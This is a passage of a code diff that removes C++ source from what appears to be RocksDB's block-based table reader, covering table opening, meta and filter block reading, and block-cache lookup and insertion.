-    prefetch_off = 0;
-    prefetch_len = file_size;
-  } else {
-    prefetch_off = file_size - kTailPrefetchSize;
-    prefetch_len = kTailPrefetchSize;
-  }
-  Status s;
-  // TODO should not have this special logic in the future.
-  if (!file->use_direct_io()) {
-    s = file->Prefetch(prefetch_off, prefetch_len);
-  } else {
-    prefetch_buffer.reset(new FilePrefetchBuffer());
-    s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);
-  }
-  s = ReadFooterFromFile(file.get(), prefetch_buffer.get(), file_size, &footer,
-                         kBlockBasedTableMagicNumber);
-  if (!s.ok()) {
-    return s;
-  }
-  if (!BlockBasedTableSupportedVersion(footer.version())) {
-    return Status::Corruption(
-        "Unknown Footer version. Maybe this file was created with newer "
-        "version of RocksDB?");
-  }
-
-  // We've successfully read the footer. We are ready to serve requests.
-  // Better not mutate rep_ after the creation. eg. internal_prefix_transform
-  // raw pointer will be used to create HashIndexReader, whose reset may
-  // access a dangling pointer.
-  Rep* rep = new BlockBasedTable::Rep(ioptions, env_options, table_options,
-                                      internal_comparator, skip_filters);
-  rep->file = std::move(file);
-  rep->footer = footer;
-  rep->index_type = table_options.index_type;
-  rep->hash_index_allow_collision = table_options.hash_index_allow_collision;
-  // We need to wrap data with internal_prefix_transform to make sure it can
-  // handle prefix correctly.
-  rep->internal_prefix_transform.reset(
-      new InternalKeySliceTransform(rep->ioptions.prefix_extractor));
-  SetupCacheKeyPrefix(rep, file_size);
-  unique_ptr<BlockBasedTable> new_table(new BlockBasedTable(rep));
-
-  // page cache options
-  rep->persistent_cache_options =
-      PersistentCacheOptions(rep->table_options.persistent_cache,
-                             std::string(rep->persistent_cache_key_prefix,
-                                         rep->persistent_cache_key_prefix_size),
-                                         rep->ioptions.statistics);
-
-  // Read meta index
-  std::unique_ptr<Block> meta;
-  std::unique_ptr<InternalIterator> meta_iter;
-  s = ReadMetaBlock(rep, prefetch_buffer.get(), &meta, &meta_iter);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Find filter handle and filter type
-  if (rep->filter_policy) {
-    for (auto filter_type :
-         {Rep::FilterType::kFullFilter, Rep::FilterType::kPartitionedFilter,
-          Rep::FilterType::kBlockFilter}) {
-      std::string prefix;
-      switch (filter_type) {
-        case Rep::FilterType::kFullFilter:
-          prefix = kFullFilterBlockPrefix;
-          break;
-        case Rep::FilterType::kPartitionedFilter:
-          prefix = kPartitionedFilterBlockPrefix;
-          break;
-        case Rep::FilterType::kBlockFilter:
-          prefix = kFilterBlockPrefix;
-          break;
-        default:
-          assert(0);
-      }
-      std::string filter_block_key = prefix;
-      filter_block_key.append(rep->filter_policy->Name());
-      if (FindMetaBlock(meta_iter.get(), filter_block_key, &rep->filter_handle)
-              .ok()) {
-        rep->filter_type = filter_type;
-        break;
-      }
-    }
-  }
-
-  // Read the properties
-  bool found_properties_block = true;
-  s = SeekToPropertiesBlock(meta_iter.get(), &found_properties_block);
-
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(rep->ioptions.info_log,
-                   "Error when seeking to properties block from file: %s",
-                   s.ToString().c_str());
-  } else if (found_properties_block) {
-    s = meta_iter->status();
-    TableProperties* table_properties = nullptr;
-    if (s.ok()) {
-      s = ReadProperties(meta_iter->value(), rep->file.get(),
-                         prefetch_buffer.get(), rep->footer, rep->ioptions,
-                         &table_properties);
-    }
-
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log,
-                     "Encountered error while reading data from properties "
-                     "block %s",
-                     s.ToString().c_str());
-    } else {
-      rep->table_properties.reset(table_properties);
-    }
-  } else {
-    ROCKS_LOG_ERROR(rep->ioptions.info_log,
-                    "Cannot find Properties block from file.");
-  }
-
-  // Read the compression dictionary meta block
-  bool found_compression_dict;
-  s = SeekToCompressionDictBlock(meta_iter.get(), &found_compression_dict);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(
-        rep->ioptions.info_log,
-        "Error when seeking to compression dictionary block from file: %s",
-        s.ToString().c_str());
-  } else if (found_compression_dict) {
-    // TODO(andrewkr): Add to block cache if cache_index_and_filter_blocks is
-    // true.
-    unique_ptr<BlockContents> compression_dict_block{new BlockContents()};
-    // TODO(andrewkr): ReadMetaBlock repeats SeekToCompressionDictBlock().
-    // maybe decode a handle from meta_iter
-    // and do ReadBlockContents(handle) instead
-    s = rocksdb::ReadMetaBlock(rep->file.get(), prefetch_buffer.get(),
-                               file_size, kBlockBasedTableMagicNumber,
-                               rep->ioptions, rocksdb::kCompressionDictBlock,
-                               compression_dict_block.get());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(
-          rep->ioptions.info_log,
-          "Encountered error while reading data from compression dictionary "
-          "block %s",
-          s.ToString().c_str());
-    } else {
-      rep->compression_dict_block = std::move(compression_dict_block);
-    }
-  }
-
-  // Read the range del meta block
-  bool found_range_del_block;
-  s = SeekToRangeDelBlock(meta_iter.get(), &found_range_del_block,
-                          &rep->range_del_handle);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(
-        rep->ioptions.info_log,
-        "Error when seeking to range delete tombstones block from file: %s",
-        s.ToString().c_str());
-  } else {
-    if (found_range_del_block && !rep->range_del_handle.IsNull()) {
-      ReadOptions read_options;
-      s = MaybeLoadDataBlockToCache(
-          prefetch_buffer.get(), rep, read_options, rep->range_del_handle,
-          Slice() /* compression_dict */, &rep->range_del_entry);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(
-            rep->ioptions.info_log,
-            "Encountered error while reading data from range del block %s",
-            s.ToString().c_str());
-      }
-    }
-  }
-
-  // Determine whether whole key filtering is supported.
-  if (rep->table_properties) {
-    rep->whole_key_filtering &=
-        IsFeatureSupported(*(rep->table_properties),
-                           BlockBasedTablePropertyNames::kWholeKeyFiltering,
-                           rep->ioptions.info_log);
-    rep->prefix_filtering &= IsFeatureSupported(
-        *(rep->table_properties),
-        BlockBasedTablePropertyNames::kPrefixFiltering, rep->ioptions.info_log);
-
-    rep->global_seqno = GetGlobalSequenceNumber(*(rep->table_properties),
-                                                rep->ioptions.info_log);
-  }
-
-  const bool pin =
-      rep->table_options.pin_l0_filter_and_index_blocks_in_cache && level == 0;
-  // pre-fetching of blocks is turned on
-  // Will use block cache for index/filter blocks access
-  // Always prefetch index and filter for level 0
-  if (table_options.cache_index_and_filter_blocks) {
-    if (prefetch_index_and_filter_in_cache || level == 0) {
-      assert(table_options.block_cache != nullptr);
-      // Hack: Call NewIndexIterator() to implicitly add index to the
-      // block_cache
-
-      CachableEntry<IndexReader> index_entry;
-      unique_ptr<InternalIterator> iter(
-          new_table->NewIndexIterator(ReadOptions(), nullptr, &index_entry));
-      index_entry.value->CacheDependencies(pin);
-      if (pin) {
-        rep->index_entry = std::move(index_entry);
-      } else {
-        index_entry.Release(table_options.block_cache.get());
-      }
-      s = iter->status();
-
-      if (s.ok()) {
-        // Hack: Call GetFilter() to implicitly add filter to the block_cache
-        auto filter_entry = new_table->GetFilter();
-        if (filter_entry.value != nullptr) {
-          filter_entry.value->CacheDependencies(pin);
-        }
-        // if pin_l0_filter_and_index_blocks_in_cache is true, and this is
-        // a level0 file, then save it in rep_->filter_entry; it will be
-        // released in the destructor only, hence it will be pinned in the
-        // cache while this reader is alive
-        if (pin) {
-          rep->filter_entry = filter_entry;
-        } else {
-          filter_entry.Release(table_options.block_cache.get());
-        }
-      }
-    }
-  } else {
-    // If we don't use block cache for index/filter blocks access, we'll
-    // pre-load these blocks, which will kept in member variables in Rep
-    // and with a same life-time as this table object.
-    IndexReader* index_reader = nullptr;
-    s = new_table->CreateIndexReader(prefetch_buffer.get(), &index_reader,
-                                     meta_iter.get(), level);
-    if (s.ok()) {
-      rep->index_reader.reset(index_reader);
-      // The partitions of partitioned index are always stored in cache. They
-      // are hence follow the configuration for pin and prefetch regardless of
-      // the value of cache_index_and_filter_blocks
-      if (prefetch_index_and_filter_in_cache || level == 0) {
-        rep->index_reader->CacheDependencies(pin);
-      }
-
-      // Set filter block
-      if (rep->filter_policy) {
-        const bool is_a_filter_partition = true;
-        auto filter = new_table->ReadFilter(
-            prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition);
-        rep->filter.reset(filter);
-        // Refer to the comment above about paritioned indexes always being
-        // cached
-        if (filter && (prefetch_index_and_filter_in_cache || level == 0)) {
-          filter->CacheDependencies(pin);
-        }
-      }
-    } else {
-      delete index_reader;
-    }
-  }
-
-  if (s.ok()) {
-    *table_reader = std::move(new_table);
-  }
-
-  return s;
-}
-
-void BlockBasedTable::SetupForCompaction() {
-  switch (rep_->ioptions.access_hint_on_compaction_start) {
-    case Options::NONE:
-      break;
-    case Options::NORMAL:
-      rep_->file->file()->Hint(RandomAccessFile::NORMAL);
-      break;
-    case Options::SEQUENTIAL:
-      rep_->file->file()->Hint(RandomAccessFile::SEQUENTIAL);
-      break;
-    case Options::WILLNEED:
-      rep_->file->file()->Hint(RandomAccessFile::WILLNEED);
-      break;
-    default:
-      assert(false);
-  }
-}
-
-std::shared_ptr<const TableProperties> BlockBasedTable::GetTableProperties()
-    const {
-  return rep_->table_properties;
-}
-
-size_t BlockBasedTable::ApproximateMemoryUsage() const {
-  size_t usage = 0;
-  if (rep_->filter) {
-    usage += rep_->filter->ApproximateMemoryUsage();
-  }
-  if (rep_->index_reader) {
-    usage += rep_->index_reader->ApproximateMemoryUsage();
-  }
-  return usage;
-}
-
-// Load the meta-block from the file. On success, return the loaded meta block
-// and its iterator.
-Status BlockBasedTable::ReadMetaBlock(Rep* rep,
-                                      FilePrefetchBuffer* prefetch_buffer,
-                                      std::unique_ptr<Block>* meta_block,
-                                      std::unique_ptr<InternalIterator>* iter) {
-  // TODO(sanjay): Skip this if footer.metaindex_handle() size indicates
-  // it is an empty block.
-  std::unique_ptr<Block> meta;
-  Status s = ReadBlockFromFile(
-      rep->file.get(), prefetch_buffer, rep->footer, ReadOptions(),
-      rep->footer.metaindex_handle(), &meta, rep->ioptions,
-      true /* decompress */, Slice() /*compression dict*/,
-      rep->persistent_cache_options, kDisableGlobalSequenceNumber,
-      0 /* read_amp_bytes_per_bit */);
-
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(rep->ioptions.info_log,
-                    "Encountered error while reading data from properties"
-                    " block %s",
-                    s.ToString().c_str());
-    return s;
-  }
-
-  *meta_block = std::move(meta);
-  // meta block uses bytewise comparator.
-  iter->reset(meta_block->get()->NewIterator(BytewiseComparator()));
-  return Status::OK();
-}
-
-Status BlockBasedTable::GetDataBlockFromCache(
-    const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-    Cache* block_cache, Cache* block_cache_compressed,
-    const ImmutableCFOptions& ioptions, const ReadOptions& read_options,
-    BlockBasedTable::CachableEntry<Block>* block, uint32_t format_version,
-    const Slice& compression_dict, size_t read_amp_bytes_per_bit,
-    bool is_index) {
-  Status s;
-  Block* compressed_block = nullptr;
-  Cache::Handle* block_cache_compressed_handle = nullptr;
-  Statistics* statistics = ioptions.statistics;
-
-  // Lookup uncompressed cache first
-  if (block_cache != nullptr) {
-    block->cache_handle = GetEntryFromCache(
-        block_cache, block_cache_key,
-        is_index ? BLOCK_CACHE_INDEX_MISS : BLOCK_CACHE_DATA_MISS,
-        is_index ? BLOCK_CACHE_INDEX_HIT : BLOCK_CACHE_DATA_HIT, statistics);
-    if (block->cache_handle != nullptr) {
-      block->value =
-          reinterpret_cast<Block*>(block_cache->Value(block->cache_handle));
-      return s;
-    }
-  }
-
-  // If not found, search from the compressed block cache.
-  assert(block->cache_handle == nullptr && block->value == nullptr);
-
-  if (block_cache_compressed == nullptr) {
-    return s;
-  }
-
-  assert(!compressed_block_cache_key.empty());
-  block_cache_compressed_handle =
-      block_cache_compressed->Lookup(compressed_block_cache_key);
-  // if we found in the compressed cache, then uncompress and insert into
-  // uncompressed cache
-  if (block_cache_compressed_handle == nullptr) {
-    RecordTick(statistics, BLOCK_CACHE_COMPRESSED_MISS);
-    return s;
-  }
-
-  // found compressed block
-  RecordTick(statistics, BLOCK_CACHE_COMPRESSED_HIT);
-  compressed_block = reinterpret_cast<Block*>(
-      block_cache_compressed->Value(block_cache_compressed_handle));
-  assert(compressed_block->compression_type() != kNoCompression);
-
-  // Retrieve the uncompressed contents into a new buffer
-  BlockContents contents;
-  s = UncompressBlockContents(compressed_block->data(),
-                              compressed_block->size(), &contents,
-                              format_version, compression_dict,
-                              ioptions);
-
-  // Insert uncompressed block into block cache
-  if (s.ok()) {
-    block->value =
-        new Block(std::move(contents), compressed_block->global_seqno(),
-                  read_amp_bytes_per_bit,
-                  statistics);  // uncompressed block
-    assert(block->value->compression_type() == kNoCompression);
-    if (block_cache != nullptr && block->value->cachable() &&
-        read_options.fill_cache) {
-      s = block_cache->Insert(
-          block_cache_key, block->value, block->value->usable_size(),
-          &DeleteCachedEntry<Block>, &(block->cache_handle));
-      block_cache->TEST_mark_as_data_block(block_cache_key,
-                                           block->value->usable_size());
-      if (s.ok()) {
-        RecordTick(statistics, BLOCK_CACHE_ADD);
-        if (is_index) {
-          RecordTick(statistics, BLOCK_CACHE_INDEX_ADD);
-          RecordTick(statistics, BLOCK_CACHE_INDEX_BYTES_INSERT,
-                     block->value->usable_size());
-        } else {
-          RecordTick(statistics, BLOCK_CACHE_DATA_ADD);
-          RecordTick(statistics, BLOCK_CACHE_DATA_BYTES_INSERT,
-                     block->value->usable_size());
-        }
-        RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE,
-                   block->value->usable_size());
-      } else {
-        RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-        delete block->value;
-        block->value = nullptr;
-      }
-    }
-  }
-
-  // Release hold on compressed cache entry
-  block_cache_compressed->Release(block_cache_compressed_handle);
-  return s;
-}
-
-Status BlockBasedTable::PutDataBlockToCache(
-    const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-    Cache* block_cache, Cache* block_cache_compressed,
-    const ReadOptions& read_options, const ImmutableCFOptions& ioptions,
-    CachableEntry<Block>* block, Block* raw_block, uint32_t format_version,
-    const Slice& compression_dict, size_t read_amp_bytes_per_bit, bool is_index,
-    Cache::Priority priority) {
-  assert(raw_block->compression_type() == kNoCompression ||
-         block_cache_compressed != nullptr);
-
-  Status s;
-  // Retrieve the uncompressed contents into a new buffer
-  BlockContents contents;
-  Statistics* statistics = ioptions.statistics;
-  if (raw_block->compression_type() != kNoCompression) {
-    s = UncompressBlockContents(raw_block->data(), raw_block->size(), &contents,
-                                format_version, compression_dict, ioptions);
-  }
-  if (!s.ok()) {
-    delete raw_block;
-    return s;
-  }
-
-  if (raw_block->compression_type() != kNoCompression) {
-    block->value = new Block(std::move(contents), raw_block->global_seqno(),
-                             read_amp_bytes_per_bit,
-                             statistics);  // uncompressed block
-  } else {
-    block->value = raw_block;
-    raw_block = nullptr;
-  }
-
-  // Insert compressed block into compressed block cache.
-  // Release the hold on the compressed cache entry immediately.
-  if (block_cache_compressed != nullptr && raw_block != nullptr &&
-      raw_block->cachable()) {
-    s = block_cache_compressed->Insert(compressed_block_cache_key, raw_block,
-                                       raw_block->usable_size(),
-                                       &DeleteCachedEntry<Block>);
-    if (s.ok()) {
-      // Avoid the following code to delete this cached block.
-      raw_block = nullptr;
-      RecordTick(statistics, BLOCK_CACHE_COMPRESSED_ADD);
-    } else {
-      RecordTick(statistics, BLOCK_CACHE_COMPRESSED_ADD_FAILURES);
-    }
-  }
-  delete raw_block;
-
-  // insert into uncompressed block cache
-  assert((block->value->compression_type() == kNoCompression));
-  if (block_cache != nullptr && block->value->cachable()) {
-    s = block_cache->Insert(
-        block_cache_key, block->value, block->value->usable_size(),
-        &DeleteCachedEntry<Block>, &(block->cache_handle), priority);
-    block_cache->TEST_mark_as_data_block(block_cache_key,
-                                         block->value->usable_size());
-    if (s.ok()) {
-      assert(block->cache_handle != nullptr);
-      RecordTick(statistics, BLOCK_CACHE_ADD);
-      if (is_index) {
-        RecordTick(statistics, BLOCK_CACHE_INDEX_ADD);
-        RecordTick(statistics, BLOCK_CACHE_INDEX_BYTES_INSERT,
-                   block->value->usable_size());
-      } else {
-        RecordTick(statistics, BLOCK_CACHE_DATA_ADD);
-        RecordTick(statistics, BLOCK_CACHE_DATA_BYTES_INSERT,
-                   block->value->usable_size());
-      }
-      RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE,
-                 block->value->usable_size());
-      assert(reinterpret_cast<Block*>(
-                 block_cache->Value(block->cache_handle)) == block->value);
-    } else {
-      RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-      delete block->value;
-      block->value = nullptr;
-    }
-  }
-
-  return s;
-}
-
-FilterBlockReader* BlockBasedTable::ReadFilter(
-    FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_handle,
-    const bool is_a_filter_partition) const {
-  auto& rep = rep_;
-  // TODO: We might want to unify with ReadBlockFromFile() if we start
-  // requiring checksum verification in Table::Open.
-  if (rep->filter_type == Rep::FilterType::kNoFilter) {
-    return nullptr;
-  }
-  BlockContents block;
-  if (!ReadBlockContents(rep->file.get(), prefetch_buffer, rep->footer,
-                         ReadOptions(), filter_handle, &block, rep->ioptions,
-                         false /* decompress */, Slice() /*compression dict*/,
-                         rep->persistent_cache_options)
-           .ok()) {
-    // Error reading the block
-    return nullptr;
-  }
-
-  assert(rep->filter_policy);
-
-  auto filter_type = rep->filter_type;
-  if (rep->filter_type == Rep::FilterType::kPartitionedFilter &&
-      is_a_filter_partition) {
-    filter_type = Rep::FilterType::kFullFilter;
-  }
-
-  switch (filter_type) {
-    case Rep::FilterType::kPartitionedFilter: {
-      return new PartitionedFilterBlockReader(
-          rep->prefix_filtering ? rep->ioptions.prefix_extractor : nullptr,
-          rep->whole_key_filtering, std::move(block), nullptr,
-          rep->ioptions.statistics, rep->internal_comparator, this);
-    }
-
-    case Rep::FilterType::kBlockFilter:
-      return new BlockBasedFilterBlockReader(
-          rep->prefix_filtering ? rep->ioptions.prefix_extractor : nullptr,
-          rep->table_options, rep->whole_key_filtering, std::move(block),
-          rep->ioptions.statistics);
-
-    case Rep::FilterType::kFullFilter: {
-      auto filter_bits_reader =
-          rep->filter_policy->GetFilterBitsReader(block.data);
-      assert(filter_bits_reader != nullptr);
-      return new FullFilterBlockReader(
-          rep->prefix_filtering ? rep->ioptions.prefix_extractor : nullptr,
-          rep->whole_key_filtering, std::move(block), filter_bits_reader,
-          rep->ioptions.statistics);
-    }
-
-    default:
-      // filter_type is either kNoFilter (exited the function at the first if),
-      // or it must be covered in this switch block
-      assert(false);
-      return nullptr;
-  }
-}
-
-BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter(
-    FilePrefetchBuffer* prefetch_buffer, bool no_io) const {
-  const BlockHandle& filter_blk_handle = rep_->filter_handle;
-  const bool is_a_filter_partition = true;
-  return GetFilter(prefetch_buffer, filter_blk_handle, !is_a_filter_partition,
-                   no_io);
-}
-
-BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter(
-    FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle,
-    const bool is_a_filter_partition, bool no_io) const {
-  // If cache_index_and_filter_blocks is false, filter should be pre-populated.
-  // We will return rep_->filter anyway. rep_->filter can be nullptr if filter
-  // read fails at Open() time. We don't want to reload again since it will
-  // most probably fail again.
-  if (!is_a_filter_partition &&
-      !rep_->table_options.cache_index_and_filter_blocks) {
-    return {rep_->filter.get(), nullptr /* cache handle */};
-  }
-
-  Cache* block_cache = rep_->table_options.block_cache.get();
-  if (rep_->filter_policy == nullptr /* do not use filter */ ||
-      block_cache == nullptr /* no block cache at all */) {
-    return {nullptr /* filter */, nullptr /* cache handle */};
-  }
-
-  if (!is_a_filter_partition && rep_->filter_entry.IsSet()) {
-    return rep_->filter_entry;
-  }
-
-  PERF_TIMER_GUARD(read_filter_block_nanos);
-
-  // Fetching from the cache
-  char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = GetCacheKey(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                         filter_blk_handle, cache_key);
-
-  Statistics* statistics = rep_->ioptions.statistics;
-  auto cache_handle =
-      GetEntryFromCache(block_cache, key, BLOCK_CACHE_FILTER_MISS,
-                        BLOCK_CACHE_FILTER_HIT, statistics);
-
-  FilterBlockReader* filter = nullptr;
-  if (cache_handle != nullptr) {
-    filter = reinterpret_cast<FilterBlockReader*>(
-        block_cache->Value(cache_handle));
-  } else if (no_io) {
-    // Do not invoke any io.
-    return CachableEntry<FilterBlockReader>();
-  } else {
-    filter =
-        ReadFilter(prefetch_buffer, filter_blk_handle, is_a_filter_partition);
-    if (filter != nullptr) {
-      assert(filter->size() > 0);
-      Status s = block_cache->Insert(
-          key, filter, filter->size(), &DeleteCachedFilterEntry, &cache_handle,
-          rep_->table_options.cache_index_and_filter_blocks_with_high_priority
-              ? Cache::Priority::HIGH
-              : Cache::Priority::LOW);
-      if (s.ok()) {
-        RecordTick(statistics, BLOCK_CACHE_ADD);
-        RecordTick(statistics, BLOCK_CACHE_FILTER_ADD);
-        RecordTick(statistics, BLOCK_CACHE_FILTER_BYTES_INSERT, filter->size());
-        RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE, filter->size());
-      } else {
-        RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-        delete filter;
-        return CachableEntry<FilterBlockReader>();
-      }
-    }
-  }
-
-  return { filter, cache_handle };
-}
-
-InternalIterator* BlockBasedTable::NewIndexIterator(
-    const ReadOptions& read_options, BlockIter* input_iter,
-    CachableEntry<IndexReader>* index_entry) {
-  // index reader has already been pre-populated.
-  if (rep_->index_reader) {
-    return rep_->index_reader->NewIterator(
-        input_iter, read_options.total_order_seek);
-  }
-  // we have a pinned index block
-  if (rep_->index_entry.IsSet()) {
-    return rep_->index_entry.value->NewIterator(input_iter,
-                                                read_options.total_order_seek);
-  }
-
-  PERF_TIMER_GUARD(read_index_block_nanos);
-
-  const bool no_io = read_options.read_tier == kBlockCacheTier;
-  Cache* block_cache = rep_->table_options.block_cache.get();
-  char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key =
-      GetCacheKeyFromOffset(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                            rep_->dummy_index_reader_offset, cache_key);
-  Statistics* statistics = rep_->ioptions.statistics;
-  auto cache_handle =
-      GetEntryFromCache(block_cache, key, BLOCK_CACHE_INDEX_MISS,
-                        BLOCK_CACHE_INDEX_HIT, statistics);
-
-  if (cache_handle == nullptr && no_io) {
-    if (input_iter != nullptr) {
-      input_iter->SetStatus(Status::Incomplete("no blocking io"));
-      return input_iter;
-    } else {
-      return NewErrorInternalIterator(Status::Incomplete("no blocking io"));
-    }
-  }
-
-  IndexReader* index_reader = nullptr;
-  if (cache_handle != nullptr) {
-    index_reader =
-        reinterpret_cast<IndexReader*>(block_cache->Value(cache_handle));
-  } else {
-    // Create index reader and put it in the cache.
-    Status s;
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:2");
-    s = CreateIndexReader(nullptr /* prefetch_buffer */, &index_reader);
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:1");
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:3");
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:4");
-    if (s.ok()) {
-      assert(index_reader != nullptr);
-      s = block_cache->Insert(
-          key, index_reader, index_reader->usable_size(),
-          &DeleteCachedIndexEntry, &cache_handle,
-          rep_->table_options.cache_index_and_filter_blocks_with_high_priority
-              ? Cache::Priority::HIGH
-              : Cache::Priority::LOW);
-    }
-
-    if (s.ok()) {
-      size_t usable_size = index_reader->usable_size();
-      RecordTick(statistics, BLOCK_CACHE_ADD);
-      RecordTick(statistics, BLOCK_CACHE_INDEX_ADD);
-      RecordTick(statistics, BLOCK_CACHE_INDEX_BYTES_INSERT, usable_size);
-      RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE, usable_size);
-    } else {
-      if (index_reader != nullptr) {
-        delete index_reader;
-      }
-      RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-      // make sure if something goes wrong, index_reader shall remain intact.
-      if (input_iter != nullptr) {
-        input_iter->SetStatus(s);
-        return input_iter;
-      } else {
-        return NewErrorInternalIterator(s);
-      }
-    }
-
-  }
-
-  assert(cache_handle);
-  auto* iter = index_reader->NewIterator(
-      input_iter, read_options.total_order_seek);
-
-  // the caller would like to take ownership of the index block
-  // don't call RegisterCleanup() in this case, the caller will take care of it
-  if (index_entry != nullptr) {
-    *index_entry = {index_reader, cache_handle};
-  } else {
-    iter->RegisterCleanup(&ReleaseCachedEntry, block_cache, cache_handle);
-  }
-
-  return iter;
-}
-
-InternalIterator* BlockBasedTable::NewDataBlockIterator(
-    Rep* rep, const ReadOptions& ro, const Slice& index_value,
-    BlockIter* input_iter, bool is_index) {
-  BlockHandle handle;
-  Slice input = index_value;
-  // We intentionally allow extra stuff in index_value so that we
-  // can add more features in the future.
-  Status s = handle.DecodeFrom(&input);
-  return NewDataBlockIterator(rep, ro, handle, input_iter, is_index, s);
-}
-
-// Convert an index iterator value (i.e., an encoded BlockHandle)
-// into an iterator over the contents of the corresponding block.
-// If input_iter is null, new a iterator
-// If input_iter is not null, update this iter and return it
-InternalIterator* BlockBasedTable::NewDataBlockIterator(
-    Rep* rep, const ReadOptions& ro, const BlockHandle& handle,
-    BlockIter* input_iter, bool is_index, Status s) {
-  PERF_TIMER_GUARD(new_table_block_iter_nanos);
-
-  const bool no_io = (ro.read_tier == kBlockCacheTier);
-  Cache* block_cache = rep->table_options.block_cache.get();
-  CachableEntry<Block> block;
-  Slice compression_dict;
-  if (s.ok()) {
-    if (rep->compression_dict_block) {
-      compression_dict = rep->compression_dict_block->data;
-    }
-    s = MaybeLoadDataBlockToCache(nullptr /*prefetch_buffer*/, rep, ro, handle,
-                                  compression_dict, &block, is_index);
-  }
-
-  // Didn't get any data from block caches.
-  if (s.ok() && block.value == nullptr) {
-    if (no_io) {
-      // Could not read from block_cache and can't do IO
-      if (input_iter != nullptr) {
-        input_iter->SetStatus(Status::Incomplete("no blocking io"));
-        return input_iter;
-      } else {
-        return NewErrorInternalIterator(Status::Incomplete("no blocking io"));
-      }
-    }
-    std::unique_ptr<Block> block_value;
-    s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer */,
-                          rep->footer, ro, handle, &block_value, rep->ioptions,
-                          true /* compress */, compression_dict,
-                          rep->persistent_cache_options, rep->global_seqno,
-                          rep->table_options.read_amp_bytes_per_bit);
-    if (s.ok()) {
-      block.value = block_value.release();
-    }
-  }
-
-  InternalIterator* iter;
-  if (s.ok()) {
-    assert(block.value != nullptr);
-    iter = block.value->NewIterator(&rep->internal_comparator, input_iter, true,
-                                    rep->ioptions.statistics);
-    if (block.cache_handle != nullptr) {
-      iter->RegisterCleanup(&ReleaseCachedEntry, block_cache,
-                            block.cache_handle);
-    } else {
-      iter->RegisterCleanup(&DeleteHeldResource<Block>, block.value, nullptr);
-    }
-  } else {
-    assert(block.value == nullptr);
-    if (input_iter != nullptr) {
-      input_iter->SetStatus(s);
-      iter = input_iter;
-    } else {
-      iter = NewErrorInternalIterator(s);
-    }
-  }
-  return iter;
-}
-
-Status BlockBasedTable::MaybeLoadDataBlockToCache(
-    FilePrefetchBuffer* prefetch_buffer, Rep* rep, const ReadOptions& ro,
-    const BlockHandle& handle, Slice compression_dict,
-    CachableEntry<Block>* block_entry, bool is_index) {
-  assert(block_entry != nullptr);
-  const bool no_io = (ro.read_tier == kBlockCacheTier);
-  Cache* block_cache = rep->table_options.block_cache.get();
-  Cache* block_cache_compressed =
-      rep->table_options.block_cache_compressed.get();
-
-  // If either block cache is enabled, we'll try to read from it.
-  Status s;
-  if (block_cache != nullptr || block_cache_compressed != nullptr) {
-    Statistics* statistics = rep->ioptions.statistics;
-    char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-    char compressed_cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-    Slice key, /* key to the block cache */
-        ckey /* key to the compressed block cache */;
-
-    // create key for block cache
-    if (block_cache != nullptr) {
-      key = GetCacheKey(rep->cache_key_prefix, rep->cache_key_prefix_size,
-                        handle, cache_key);
-    }
-
-    if (block_cache_compressed != nullptr) {
-      ckey = GetCacheKey(rep->compressed_cache_key_prefix,
-                         rep->compressed_cache_key_prefix_size, handle,
-                         compressed_cache_key);
-    }
-
-    s = GetDataBlockFromCache(
-        key, ckey, block_cache, block_cache_compressed, rep->ioptions, ro,
-        block_entry, rep->table_options.format_version, compression_dict,
-        rep->table_options.read_amp_bytes_per_bit, is_index);
-
-    if (block_entry->value == nullptr && !no_io && ro.fill_cache) {
-      std::unique_ptr<Block> raw_block;
-      {
-        StopWatch sw(rep->ioptions.env, statistics, READ_BLOCK_GET_MICROS);
-        s = ReadBlockFromFile(
-            rep->file.get(), prefetch_buffer, rep->footer, ro, handle,
-            &raw_block, rep->ioptions, block_cache_compressed == nullptr,
-            compression_dict, rep->persistent_cache_options, rep->global_seqno,
-            rep->table_options.read_amp_bytes_per_bit);
-      }
-
-      if (s.ok()) {
-        s = PutDataBlockToCache(
-            key, ckey, block_cache, block_cache_compressed, ro, rep->ioptions,
-            block_entry, raw_block.release(), rep->table_options.format_version,
-            compression_dict, rep->table_options.read_amp_bytes_per_bit,
-            is_index,
-            is_index &&
-                    rep->table_options
-                        .cache_index_and_filter_blocks_with_high_priority
-                ? Cache::Priority::HIGH
-                : Cache::Priority::LOW);
-      }
-    }
-  }
-  assert(s.ok() || block_entry->value == nullptr);
-  return s;
-}
-
-BlockBasedTable::BlockEntryIteratorState::BlockEntryIteratorState(
-    BlockBasedTable* table, const ReadOptions& read_options,
